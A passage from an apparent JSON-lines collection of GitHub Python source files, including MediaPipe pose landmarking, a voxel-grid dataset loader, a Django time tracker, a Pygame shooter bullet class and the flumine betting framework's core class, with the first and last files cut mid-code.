normalized_rect = self.convert_to_normalized_rect(\n image_processing_options, image, roi_allowed=False\n )\n output_packets = self._process_video_data({\n _IMAGE_IN_STREAM_NAME: packet_creator.create_image(image).at(\n timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND\n ),\n _NORM_RECT_STREAM_NAME: packet_creator.create_proto(\n normalized_rect.to_pb2()\n ).at(timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND),\n })\n\n if output_packets[_NORM_LANDMARKS_STREAM_NAME].is_empty():\n return PoseLandmarkerResult([], [])\n\n return _build_landmarker_result(output_packets)\n\n def detect_async(\n self,\n image: image_module.Image,\n timestamp_ms: int,\n image_processing_options: Optional[_ImageProcessingOptions] = None,\n ) -> None:\n \"\"\"Sends live image data to perform pose landmarks detection.\n\n The results will be available via the \"result_callback\" provided in the\n PoseLandmarkerOptions. Only use this method when the PoseLandmarker is\n created with the live stream running mode.\n\n Only use this method when the PoseLandmarker is created with the live\n stream running mode. The input timestamps should be monotonically increasing\n for adjacent calls of this method. This method will return immediately after\n the input image is accepted. The results will be available via the\n `result_callback` provided in the `PoseLandmarkerOptions`. The\n `detect_async` method is designed to process live stream data such as\n camera input. To lower the overall latency, pose landmarker may drop the\n input images if needed. In other words, it's not guaranteed to have output\n per input image.\n\n The `result_callback` provides:\n - The pose landmarker detection results.\n - The input image that the pose landmarker runs on.\n - The input timestamp in milliseconds.\n\n Args:\n image: MediaPipe Image.\n timestamp_ms: The timestamp of the input image in milliseconds.\n image_processing_options: Options for image processing.\n\n Raises:\n ValueError: If the current input timestamp is smaller than what the\n pose landmarker has already processed.\n \"\"\"\n normalized_rect = self.convert_to_normalized_rect(\n image_processing_options, image, roi_allowed=False\n )\n self._send_live_stream_data({\n _IMAGE_IN_STREAM_NAME: packet_creator.create_image(image).at(\n timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND\n ),\n _NORM_RECT_STREAM_NAME: packet_creator.create_proto(\n normalized_rect.to_pb2()\n ).at(timestamp_ms * _MICRO_SECONDS_PER_MILLISECOND),\n })\n","repo_name":"google/mediapipe","sub_path":"mediapipe/tasks/python/vision/pose_landmarker.py","file_name":"pose_landmarker.py","file_ext":"py","file_size_in_byte":16314,"program_lang":"python","lang":"en","doc_type":"code","stars":23977,"dataset":"github-code","pt":"31"} +{"seq_id":"12312988778","text":"from fetch_assessment.config.configuration import ConfigurationManager\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport os\nimport joblib\n\nclass PredictionPipleline:\n def __init__(self):\n self.config=ConfigurationManager().get_evaluating_model_config()\n\n def predict(self,n_days):\n current_batch=np.load(os.path.join(self.config.data_path,\"X_test.npy\"))[-1].copy()\n model=load_model(self.config.model_path)\n scaler = joblib.load(os.path.join(self.config.data_path,\"scaler.gz\"))\n future_predictions=[]\n\n for _ in range(n_days):\n # Predict the next time step\n current_pred = model.predict(current_batch[np.newaxis, :])[0, 0]\n \n # Append the prediction to the list\n future_predictions.append(current_pred)\n \n # Update the current batch to include the new prediction and update other features\n current_batch = np.roll(current_batch, -1, axis=0)\n # Update lagged Receipt_Count\n current_batch[-1, 0] = current_pred\n # Update other features if necessary (like date components)\n\n # Rescale the predictions back to the original scale\n temp_shape = np.zeros((len(future_predictions), current_batch.shape[1]))\n temp_shape[:, 0] = future_predictions\n future_predictions_rescaled = scaler.inverse_transform(temp_shape)[:, 0]\n \n return future_predictions_rescaled.tolist()\n\n","repo_name":"SaiShashank12/fetch_assessment","sub_path":"src/fetch_assessment/pipeline/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5745162708","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Timestamp\nimport partTime\n\n# Create your views here.\ndef index(request):\n user_list = []\n sumTime = 0\n time_list = Timestamp.objects.all()\n for oneday in time_list:\n user_list.append(oneday)\n sumTime += oneday.timeLength\n\n if request.method == \"POST\":\n month = request.POST.get(\"month\", None)\n day = request.POST.get(\"day\", None)\n beginTime = request.POST.get(\"beginTime\", None)\n endTime = request.POST.get(\"endTime\", None)\n timeLength = float(endTime) - float(beginTime)\n temp = {\"month\":month, \"day\":day, \"beginTime\":beginTime, \"endTime\":endTime, \"timeLength\":timeLength}\n sumTime = 0\n user_list = []\n Timestamp.objects.create(**temp)\n time_list = Timestamp.objects.all()\n #for oneday in time_list:\n # user_list.append(oneday)\n # sumTime += oneday.timeLength\n #totalMoney = sumTime * 880\n user_list = partTime.showTimeModule(time_list)\n sumTime = 0\n for oneday in user_list:\n sumTime += oneday.timeLength\n totalMoney = sumTime * 880\n return render(request, \"index.html\", {\n \"data\":user_list, \n \"sumTime\":sumTime,\n \"totalMoney\":totalMoney\n })\n","repo_name":"irvineoy/time_records","sub_path":"testModel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25811169285","text":"# -*- coding: utf-8 -*-\n\n#Based on sXML-master projet on gitHub\n\n__author__= \"Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2015 LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nfrom import_export.sciaXML.xml_basics import scxml_table_container as ctr\nfrom import_export.sciaXML.xml_basics import scxml_table_xmlnodes as tb\nfrom import_export.sciaXML.xml_basics import scxml_object as obj\nfrom import_export.sciaXML.xml_basics import scxml_object_item as oI\nfrom import_export.sciaXML.scia_loads import load_group_properties as lgp\n\nidLoadGroupContainer= lgp.containerId\ntLoadGroupContainer= lgp.tbProgId\nidLoadGroupContainerTb= lgp.tbId\ntLoadGroupContainerTb= lgp.tbProgId\nloadGroupPrefix= 'LG'\n\ndef getLoadGroupObject(loadGroup):\n retval= obj.SCXMLObject()\n id= str(loadGroup.id)\n retval.setId(id)\n name= loadGroupPrefix+id\n retval.setNm(name)\n retval.setP0(oI.SCXMLObjectItem(name)) #Name\n tmp= None\n if(loadGroup.permanent):\n tmp= oI.SCXMLObjectItem('0')\n tmp.t= 'Permanent'\n else:\n tmp= oI.SCXMLObjectItem('1')\n tmp.t= 'Variable' \n retval.setP1(tmp)\n return retval\n\nclass LoadGroupContainer(ctr.SCXMLTableContainer):\n def __init__(self,loadGroupsDict):\n super(LoadGroupContainer,self).__init__(idLoadGroupContainer,tLoadGroupContainer)\n loadGroups= list()\n for key in sorted(loadGroupsDict):\n ns= loadGroupsDict[key]\n loadGroups.append(getLoadGroupObject(ns))\n self.appendTable(tb.SCXMLTableXMLNodes(idLoadGroupContainerTb,tLoadGroupContainerTb, 'Load groups', None,loadGroups))\n \n","repo_name":"xcfem/xc","sub_path":"python_modules/import_export/sciaXML/scia_loads/load_group_container.py","file_name":"load_group_container.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"4415216123","text":"import numpy as np, matplotlib.pyplot as plt, pandas as pd, seaborn as sns\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom scipy.io.arff import loadarff\n\n# Read the ARFF file and prepare data\ndata = loadarff(\"./data/column_diagnosis.arff\")\ndf = pd.DataFrame(data[0])\ndf[\"class\"] = df[\"class\"].str.decode(\"utf-8\")\nX, y = df.drop(\"class\", axis=1), df[\"class\"]\n\n# Initialize StratifiedKFold with 10 folds and shuffling\nfolds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)\n\n# Create kNN classifiers with k=1 and k=5\nknn_1 = KNeighborsClassifier(n_neighbors=1)\nknn_5 = KNeighborsClassifier(n_neighbors=5)\n\nlabels = [\"Hernia\", \"Normal\", \"Spondylolisthesis\"]\ncm_1, cm_5 = np.zeros((3, 3)), np.zeros((3, 3))\nfor train_k, test_k in folds.split(X, y):\n X_train, X_test = X.iloc[train_k], X.iloc[test_k]\n y_train, y_test = y.iloc[train_k], y.iloc[test_k]\n\n # Fit kNN classifiers and assess\n knn_1.fit(X_train, y_train)\n knn_5.fit(X_train, y_train)\n knn_1_pred, knn_5_pred = knn_1.predict(X_test), knn_5.predict(X_test)\n cm_1 += np.array(confusion_matrix(y_test, knn_1_pred, labels=labels))\n cm_5 += np.array(confusion_matrix(y_test, knn_5_pred, labels=labels))\n\n# Calculate cumulative confusion matrices\ncm_diff = cm_1 - cm_5\ncm_diff_df = pd.DataFrame(cm_diff, index=labels, columns=labels)\n\n# Plot the differences\nplt.figure(figsize=(9, 7))\nsns.heatmap(\n cm_diff_df, cmap=\"Purples\", annot=True, annot_kws={\"fontsize\": 14}, fmt=\"g\"\n)\nplt.xlabel(\"Predicted\")\nplt.ylabel(\"Real\")\nplt.show()\n","repo_name":"goncalobarias/Homeworks-ML","sub_path":"hw2/report/assets/code_2.py","file_name":"code_2.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73893281049","text":"import os\n\nimport pytest\n\nfrom test import StageTest\n\nfrom pymotifs.motifs.release import Loader\n\n\nclass IfeTest(StageTest):\n loader_class = Loader\n\n def test_it_loads_representative_ifes(self):\n assert self.loader.ifes('1.0') == [\n '157D|1|A+157D|1|B', '1DUH|1|A', '1EIY|1|C', '1ET4|1|E',\n '1G59|1|D', '1GID|1|B', '1IBK|1|X', '1J5E|1|A', '1KOG|1|P',\n '1MDG|1|A', '1UTD|1|0', '1VY4|1|AY', '1VY4|1|BA', '1VY4|1|BB',\n '1WMQ|1|D', '1X8W|1|B', '1X8W|1|C', '2HOJ|1|A', '2IL9|1|A',\n '3CW5|1|A', '4A3G|1|P', '4CS1|1|A', '4FTE|1|R', '4PMI|1|A',\n '4Q0B|1|T', '4Q0B|1|t', '4V88|1|A5+4V88|1|A8', '4V88|1|A6',\n '4V88|1|A7', '4V9K|1|CW'\n ]\n\n @pytest.mark.skip(\"Not sure what data to use for this\")\n def test_it_only_uses_structured_ifes(self):\n pass\n\n\nclass LoopsTest(StageTest):\n loader_class = Loader\n\n def loops(self, loop_type, *ifes, **kwargs):\n loop = kwargs.get('loop', '0.4')\n return self.loader.loops(loop, loop_type, ifes)\n\n def test_uses_all_valid_loops(self):\n assert len(self.loops('IL', '1FJG|1|A')) == 62\n assert len(self.loops('HL', '1FJG|1|A')) == 32\n\n def test_it_uses_loops_that_passed_loop_qa(self):\n loops = self.loops('HL', '1S72|1|0', '1S72|1|9')\n assert 'HL_1S72_004' not in loops\n assert 'HL_1S72_018' not in loops\n assert 'HL_1S72_021' not in loops\n assert len(loops) == 63\n\n def test_it_uses_loops_from_ife_chains(self):\n loops = self.loops('HL', '1FJG|1|A', '4V4Q|1|CA')\n assert 'HL_2IL9_001' not in loops\n assert len(loops) == 64\n\n def test_respects_the_blacklisted_loops(self):\n loops = self.loops('HL', '2IL9|1|A', '2IL9|1|M')\n assert 'HL_2IL9_002' not in loops\n assert 'HL_2IL9_005' not in loops\n assert len(loops) == 2\n\n\nclass DataTests(StageTest):\n loader_class = Loader\n\n @pytest.mark.skip(\"Do not want to run full clustering yet\")\n def test_it_creates_entries_for_hl_and_il(self):\n data = self.loader.data(['1GID', '4V4Q', '1S72'], dry_run=True)\n assert len(data) == 2\n\n @pytest.mark.skip(\"Do not want to run full clustering yet\")\n def test_it_can_cluster_motifs(self):\n data = self.loader.data(['1GID', '4V4Q', '1S72'])\n assert len(data) == 2\n assert os.path.exists(data[0]['description'])\n assert os.path.exists(data[1]['description'])\n","repo_name":"BGSU-RNA/RNA-3D-Hub-core","sub_path":"test/motifs/release_test.py","file_name":"release_test.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"15698663050","text":"lst=list()\r\nfname = input(\"Enter file name: \")\r\nfh = open(fname)\r\n\r\n#form list of words in the line\r\nfor line in fh:\r\n\twords=line.split()\r\n\r\n\t#take each word from line and put to the list\r\n\tfor word in words:\r\n\t\tif word in lst: continue\r\n\t\tlst.append(word)\r\nlst.sort()\r\nprint(lst)\r\n","repo_name":"amrutha-somayaji/Python-for-Everybody","sub_path":"Python Data Structures/Week 4/ex_04_01.py","file_name":"ex_04_01.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72419270808","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nfrom dialogs.dialog import Dialog\n\nimport os.path\n\n\nclass KeyboardShortcutsDialog(Dialog):\n\n def __init__(self, main_window):\n self.main_window = main_window\n\n def run(self):\n self.setup()\n self.view.show_all()\n del(self.view)\n\n def setup(self):\n builder = Gtk.Builder()\n builder.add_from_file(os.path.dirname(os.path.realpath(__file__)) + '/shortcuts_window.ui')\n self.view = builder.get_object('shortcuts-window')\n self.view.set_transient_for(self.main_window)\n \n\n","repo_name":"cvfosammmm/Porto","sub_path":"dialogs/keyboard_shortcuts/keyboard_shortcuts.py","file_name":"keyboard_shortcuts.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"31"} +{"seq_id":"26316332460","text":"# -*- coding: utf-8 -*-\n#\n# on_rtd is whether we are on readthedocs.org\nimport os\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\n\nif not on_rtd: # only import and set the theme if we're building docs locally\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\n# otherwise, readthedocs.org uses their theme by default, so no need to specify it\n\nproject = 'FIWARE-Stream-Oriented-GE'\n","repo_name":"kat09kat09/doc-kurento-readthedocs","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"12079779236","text":"#!/usr/bin/python2\n\nimport tensorflow as tf\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport re\nimport math\n\nimport os\n\nimport rospy\n\nfrom pyquaternion import Quaternion\n\ndef load_voxelgrid(infilename):\n ifile = open(infilename + \".binvoxelgrid\", \"r\")\n metadata = np.fromfile(ifile, dtype=np.uint32, count=5)\n\n width = metadata[2]\n height = metadata[3]\n depth = metadata[4]\n\n voxelgrid = np.fromfile(ifile, dtype=np.float32, count=width*height*depth)\n voxelgrid = np.reshape(voxelgrid, [depth, height, width])\n\n ifile.close()\n\n return voxelgrid\n\ndef save_voxelgrid(outfilename, npmatrix):\n ofile = open(outfilename + \".binvoxelgrid\", \"w\")\n ofile.write(\"VXGR\")\n\n version = 1\n width = npmatrix.shape[2]\n height = npmatrix.shape[1]\n depth = npmatrix.shape[0]\n metadata = np.asarray([version, width, height, depth], dtype=np.uint32)\n ofile.write(metadata.tobytes())\n\n npmatrix = npmatrix.astype('float32')\n ofile.write(npmatrix.tobytes())\n\n ofile.close()\n pass\n\ndef save_voxelgrid_nchannels(outfilename, npmatrix):\n trmatrix = np.transpose(npmatrix, [3, 0, 1, 2])\n for i in range(0, len(trmatrix)):\n save_voxelgrid(outfilename + str(i), trmatrix[i])\n pass\n\ndef load_voxelgrid4(infilename):\n result = []\n for i in range(0, 4):\n result.append(load_voxelgrid(infilename + str(i)))\n result = np.transpose(result, [1, 2, 3, 0])\n return result\n\ndef get_scene_3d_dataset_next_kernel(source_file_name_prefix, x_empty_prefix,\n x_frontier_prefix, y_prefix, y_channels, enable_augmentation,\n start, end):\n image_load_ok = True\n counter = start\n augmentation_counter = 0\n\n rotations = [[0, 0, 0], ]\n if ('rotation' in enable_augmentation):\n rotations = []\n #for a in range(0, 4):\n for b in range(0, 2):\n for c in range(0, 4):\n rotations.append([0, b, c])\n if ('rotation4' in enable_augmentation):\n rotations = []\n for c in range(0, 4):\n rotations.append([c, 0, 0])\n\n sub_files = 0\n sub_files_counter = 0\n if ('files8' in enable_augmentation):\n sub_files = 8\n if ('files4' in enable_augmentation):\n sub_files = 4\n\n while (image_load_ok):\n sub_file_suffix = \"\"\n if (sub_files != 0):\n sub_file_suffix = \"_gte_\" + str(sub_files_counter)\n sub_file_gt_suffix = \"\"\n if (y_channels == 4):\n sub_file_gt_suffix = \"_\"\n\n empty_filename = source_file_name_prefix + str(counter) + x_empty_prefix + sub_file_suffix\n frontier_filename = source_file_name_prefix + str(counter) + x_frontier_prefix + sub_file_suffix\n gt_filename = source_file_name_prefix + str(counter) + y_prefix + sub_file_suffix + sub_file_gt_suffix\n\n try:\n for rotation in rotations:\n #rospy.loginfo(\"nbv_3d_cnn: loading empty '%s'\" % frontier_filename)\n empty = load_voxelgrid(empty_filename)\n #rospy.loginfo(\"nbv_3d_cnn: loading frontier '%s'\" % frontier_filename)\n frontier = load_voxelgrid(frontier_filename)\n #rospy.loginfo(\"nbv_3d_cnn: loading gt '%s'\" % gt_filename)\n if (y_channels == 1 or y_channels == 52):\n gt = load_voxelgrid(gt_filename)\n elif (y_channels == 4):\n gt = load_voxelgrid4(gt_filename)\n\n empty = np.rot90(np.array(empty), k=rotation[2], axes=(0, 1))\n frontier = np.rot90(np.array(frontier), k=rotation[2], axes=(0, 1))\n gt = np.rot90(np.array(gt), k=rotation[2], axes=(0, 1))\n\n empty = np.rot90(np.array(empty), k=rotation[1], axes=(0, 2))\n frontier = np.rot90(np.array(frontier), k=rotation[1], axes=(0, 2))\n gt = np.rot90(np.array(gt), k=rotation[1], axes=(0, 2))\n\n empty = np.rot90(np.array(empty), k=rotation[0], axes=(1, 2))\n frontier = np.rot90(np.array(frontier), k=rotation[0], axes=(1, 2))\n gt = np.rot90(np.array(gt), k=rotation[0], axes=(1, 2))\n\n x = [empty, frontier]\n x = np.transpose(x, [1, 2, 3, 0])\n x = np.array(x)\n\n if (y_channels == 1 or y_channels == 52):\n gt = np.reshape(gt, [len(gt), len(gt[0]), len(gt[0][0]) / y_channels, y_channels])\n y = np.array(gt)\n\n x = x.astype('float32')\n y = y.astype('float32')\n\n batch = ((x, ), (y, ))\n\n yield batch\n pass\n\n except IOError as e:\n rospy.logerr('nbv_3d_cnn: could not load image, error is ' + str(e))\n image_load_ok = False\n pass\n\n if sub_files != 0:\n sub_files_counter += 1\n if (sub_files_counter >= sub_files):\n sub_files_counter = 0\n counter += 1\n else:\n counter += 1\n\n if (counter >= end):\n return\n\n if (rospy.is_shutdown()):\n exit()\n pass\n pass\n\n# returns: dataset, x_image_width, x_image_height, x_image_depth, y_image_width, y_image_height, y_image_depth,\ndef get_scene_3d_dataset(source_file_name_prefix, start, end, mode, enable_augmentation):\n empty_prefix = '_empty';\n frontier_prefix = '_frontier'\n\n if (mode == 'smooth_directional'):\n output_prefix = '_smooth_directional'\n y_channels = 52\n elif (mode == 'directional'):\n output_prefix = '_directional_gt'\n y_channels = 1\n elif (mode == 'quat'):\n output_prefix = '_scoreangle'\n y_channels = 4\n elif (mode == 'autocomplete'):\n output_prefix = '_environment'\n frontier_prefix = '_occupied'\n y_channels = 1\n else:\n rospy.logfatal('Invalid mode: ' + mode)\n exit(1)\n\n generator = get_scene_3d_dataset_next_kernel(source_file_name_prefix,\n empty_prefix,\n frontier_prefix,\n output_prefix,\n y_channels,\n enable_augmentation,\n start, end)\n\n for ((x, ), (y, )) in generator:\n x_image_width = len(x[0][0])\n x_image_height = len(x[0])\n x_image_depth = len(x)\n y_image_width = len(y[0][0])\n y_image_height = len(y[0])\n y_image_depth = len(y)\n break\n\n dataset = tf.data.Dataset.from_generator(lambda: get_scene_3d_dataset_next_kernel(source_file_name_prefix,\n empty_prefix,\n frontier_prefix,\n output_prefix,\n y_channels,\n enable_augmentation,\n start, end),\n output_types=(tf.float32, tf.float32),\n output_shapes=(tf.TensorShape([1, x_image_depth, x_image_height, x_image_width, 2]),\n tf.TensorShape([1, y_image_depth, y_image_height,\n y_image_width, y_channels])))\n return dataset, x_image_width, x_image_height, x_image_depth, y_image_width, y_image_height, y_image_depth\n\n","repo_name":"RMonica/nbv_3d_prob_cnn","sub_path":"nbv_3d_cnn/scripts/scene_3d_dataset.py","file_name":"scene_3d_dataset.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"5170535672","text":"import pygame\r\nimport math\r\nimport random\r\nfrom bullet import Bullet\r\n\r\n'''\r\nConcept from Bullet.py by Lukas Peraza\r\nhttps://github.com/LBPeraza/Pygame-Asteroids/tree/master/Asteroids\r\n'''\r\n\r\nclass eBullet(Bullet):\r\n\r\n @staticmethod\r\n def init():\r\n i = pygame.image.load('images/enemy-bullet.png').convert_alpha()\r\n eBullet.image = pygame.transform.scale(i, (6, 16))\r\n eBullet.width, eBullet.height = eBullet.image.get_size()\r\n\r\n def __init__(self, x, y, enemy, difficulty):\r\n super(eBullet, self).__init__(enemy.x, enemy.y, eBullet.image, eBullet.height)\r\n self.xDest = x\r\n self.yDest = y\r\n self.enemyX = enemy.x\r\n self.enemyY = enemy.y\r\n o = self.xDest - self.enemyX # opposite\r\n a = self.yDest - self.enemyY # adjacent\r\n self.angle = math.atan(o/a)\r\n\r\n self.speed = random.randint(5, 10)\r\n if difficulty == \"easy\":\r\n self.speed = random.randint(5, 8)\r\n elif difficulty == \"normal\":\r\n self.speed = random.randint(6, 9)\r\n elif difficulty == \"hard\":\r\n self.speed = random.randint(7, 10)\r\n\r\n def update(self):\r\n self.x += self.speed * self.angle\r\n self.y += self.speed\r\n self.updateRect()\r\n super(eBullet, self).update()\r\n","repo_name":"estevaz12/15-112_TP_112-Galaga","sub_path":"TP2/enemyBullet.py","file_name":"enemyBullet.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74836235928","text":"class Solution(object):\n def uniquePaths(self, m, n):\n # 2D - DP, T(n): O(n.m), S(n): O(n) - no of columns in a row\n row = [1]*n\n for i in range(m-2,-1,-1): # except the bottom row which is all 1's\n newRow = [1]*n\n for j in range(n-2,-1,-1): #except the last Col which is all 1's\n newRow[j] = newRow[j+1]+row[j] # right value + down value of previous row \n row = newRow\n return row[0]\n\n","repo_name":"KunalAnand2907/Competitive--Coding","sub_path":"62-unique-paths/unique-paths.py","file_name":"unique-paths.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13287747946","text":"import time\nimport queue\nimport logging\nimport threading\nfrom typing import Type\nfrom betfairlightweight import resources\n\nfrom .strategy.strategy import Strategies, BaseStrategy\nfrom .streams.streams import Streams\nfrom .events import events\nfrom .worker import BackgroundWorker\nfrom .clients import Clients, BaseClient\nfrom .markets.markets import Markets\nfrom .markets.market import Market\nfrom .markets.middleware import Middleware, SimulatedMiddleware\nfrom .execution.betfairexecution import BetfairExecution\nfrom .execution.simulatedexecution import SimulatedExecution\nfrom .order.process import process_current_orders\nfrom .controls.clientcontrols import BaseControl, MaxTransactionCount\nfrom .controls.tradingcontrols import (\n OrderValidation,\n StrategyExposure,\n MarketValidation,\n)\nfrom .controls.loggingcontrols import LoggingControl\nfrom .exceptions import FlumineException, ClientError\nfrom . import config, utils\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseFlumine:\n SIMULATED = False\n\n def __init__(self, client: BaseClient = None):\n \"\"\"\n Base framework class\n\n :param client: flumine client instance\n \"\"\"\n self._running = False\n # streams (market/order)\n self.streams = Streams(self)\n\n self.clients = Clients()\n\n # FIFO queue\n self.handler_queue = queue.Queue()\n\n # markets\n self.markets = Markets()\n\n # middleware\n self._market_middleware = []\n\n # strategies\n self.strategies = Strategies()\n\n # order execution class\n self.simulated_execution = SimulatedExecution(self)\n self.betfair_execution = BetfairExecution(self)\n\n # add client\n if client:\n self.add_client(client)\n\n # logging controls (e.g. database logger)\n self._logging_controls = []\n\n # trading controls\n self.trading_controls = []\n # add default controls (processed in order)\n self.add_trading_control(OrderValidation)\n self.add_trading_control(MarketValidation)\n self.add_trading_control(StrategyExposure)\n\n # workers\n self._workers = []\n\n def run(self) -> None:\n raise NotImplementedError\n\n def add_client(self, client: BaseClient) -> None:\n self.clients.add_client(client)\n self.streams.add_client(client)\n # add execution\n client.add_execution(self)\n # add simulation middleware if required\n if self.clients.simulated and not any(\n isinstance(val, SimulatedMiddleware) for val in self._market_middleware\n ):\n self.add_market_middleware(SimulatedMiddleware())\n # register default client controls (processed in order)\n self.add_client_control(client, MaxTransactionCount)\n\n def add_strategy(self, strategy: BaseStrategy) -> None:\n logger.info(\"Adding strategy %s\", strategy)\n self.streams(strategy) # create required streams\n self.strategies(strategy, self.clients, self) # store in strategies\n self.log_control(events.StrategyEvent(strategy))\n\n def add_worker(self, worker: BackgroundWorker) -> None:\n logger.info(\"Adding worker %s\", worker.name)\n self._workers.append(worker)\n\n def add_client_control(\n self, client: BaseClient, client_control: Type[BaseControl], **kwargs\n ) -> None:\n logger.info(\"Adding client control %s\", client_control.NAME)\n client.trading_controls.append(client_control(self, client, **kwargs))\n\n def add_trading_control(self, trading_control: Type[BaseControl], **kwargs) -> None:\n logger.info(\"Adding trading control %s\", trading_control.NAME)\n self.trading_controls.append(trading_control(self, **kwargs))\n\n def add_market_middleware(self, middleware: Middleware) -> None:\n logger.info(\"Adding market middleware %s\", middleware)\n self._market_middleware.append(middleware)\n\n def add_logging_control(self, logging_control: LoggingControl) -> None:\n logger.info(\"Adding logging control %s\", logging_control.NAME)\n self._logging_controls.append(logging_control)\n\n def log_control(self, event: events.BaseEvent) -> None:\n for logging_control in self._logging_controls:\n logging_control.logging_queue.put(event)\n\n def _add_default_workers(self) -> None:\n return\n\n def _process_market_books(self, event: events.MarketBookEvent) -> None:\n for market_book in event.event:\n market_id = market_book.market_id\n\n # check latency (only if marketBook is from a stream update)\n if market_book.streaming_snap is False:\n latency = time.time() - (market_book.publish_time_epoch / 1e3)\n if latency > 2:\n logger.warning(\n \"High latency between current time and MarketBook publish time\",\n extra={\n \"market_id\": market_id,\n \"latency\": latency,\n \"pt\": market_book.publish_time,\n },\n )\n\n market = self.markets.markets.get(market_id)\n market_is_new = market is None\n if market_is_new:\n market = self._add_market(market_id, market_book)\n elif market.closed:\n self.markets.add_market(market_id, market)\n\n if market_book.status == \"CLOSED\":\n self.handler_queue.put(events.CloseMarketEvent(market_book))\n continue\n\n # process market\n market(market_book)\n\n # process middleware\n for middleware in self._market_middleware:\n utils.call_middleware_error_handling(middleware, market)\n\n for strategy in self.strategies:\n if market_book.streaming_unique_id in strategy.stream_ids:\n if market_is_new:\n utils.call_strategy_error_handling(\n strategy.process_new_market, market, market_book\n )\n if utils.call_strategy_error_handling(\n strategy.check_market_book, market, market_book\n ):\n utils.call_strategy_error_handling(\n strategy.process_market_book, market, market_book\n )\n\n def _process_sports_data(self, event: events.SportsDataEvent) -> None:\n for sports_data in event.event:\n # get marketId\n market_id = sports_data.market_id\n # get market\n market = self.markets.markets.get(market_id)\n if market is None:\n logger.error(\n \"Market not present for sports data\", extra={\"market_id\": market_id}\n )\n continue\n for strategy in self.strategies:\n if utils.call_strategy_error_handling(\n strategy.check_sports, market, sports_data\n ):\n utils.call_strategy_error_handling(\n strategy.process_sports_data, market, sports_data\n )\n\n def process_order_package(self, order_package) -> None:\n \"\"\"Execute through client.\"\"\"\n order_package.client.execution.handler(order_package)\n\n def _add_market(self, market_id: str, market_book: resources.MarketBook) -> Market:\n logger.info(\"Adding: %s to markets\", market_id)\n market = Market(self, market_id, market_book)\n self.markets.add_market(market_id, market)\n for middleware in self._market_middleware:\n middleware.add_market(market)\n return market\n\n def _remove_market(self, market: Market, clear: bool = True) -> None:\n logger.info(\"Removing market %s\", market.market_id, extra=self.info)\n for middleware in self._market_middleware:\n middleware.remove_market(market)\n for strategy in self.strategies:\n strategy.remove_market(market.market_id)\n if clear:\n self.markets.remove_market(market.market_id)\n\n def _process_raw_data(self, event: events.RawDataEvent) -> None:\n stream_id, clk, publish_time, data = event.event\n for datum in data:\n if \"id\" in datum:\n market_id = datum[\"id\"]\n market = self.markets.markets.get(market_id)\n if market is None:\n market = self._add_market(market_id, None)\n elif market.closed:\n self.markets.add_market(market_id, market)\n\n if \"marketDefinition\" in datum:\n market.update_market_catalogue = True\n if datum[\"marketDefinition\"][\"status\"] == \"CLOSED\":\n datum[\"_stream_id\"] = stream_id\n self.handler_queue.put(events.CloseMarketEvent(datum))\n\n for strategy in self.strategies:\n if stream_id in strategy.stream_ids:\n utils.call_process_raw_data(strategy, clk, publish_time, datum)\n\n def _process_market_catalogues(self, event: events.MarketCatalogueEvent) -> None:\n for market_catalogue in event.event:\n market = self.markets.markets.get(market_catalogue.market_id)\n if market:\n if market.market_catalogue is None:\n market.market_catalogue = market_catalogue\n self.log_control(events.MarketEvent(market))\n logger.info(\n \"Created marketCatalogue for %s\",\n market.market_id,\n extra=market.info,\n )\n else:\n market.market_catalogue = market_catalogue\n logger.info(\n \"Updated marketCatalogue for %s\",\n market.market_id,\n extra=market.info,\n )\n market.update_market_catalogue = False\n\n for strategy in self.strategies:\n if (\n market.market_book\n and market.market_book.streaming_unique_id\n in strategy.stream_ids\n ) or strategy.market_cached(market.market_id):\n utils.call_strategy_error_handling(\n strategy.process_market_catalogue, market, market_catalogue\n )\n\n def _process_current_orders(self, event: events.CurrentOrdersEvent) -> None:\n # update state\n if event.event:\n process_current_orders(\n self.markets, self.strategies, event, 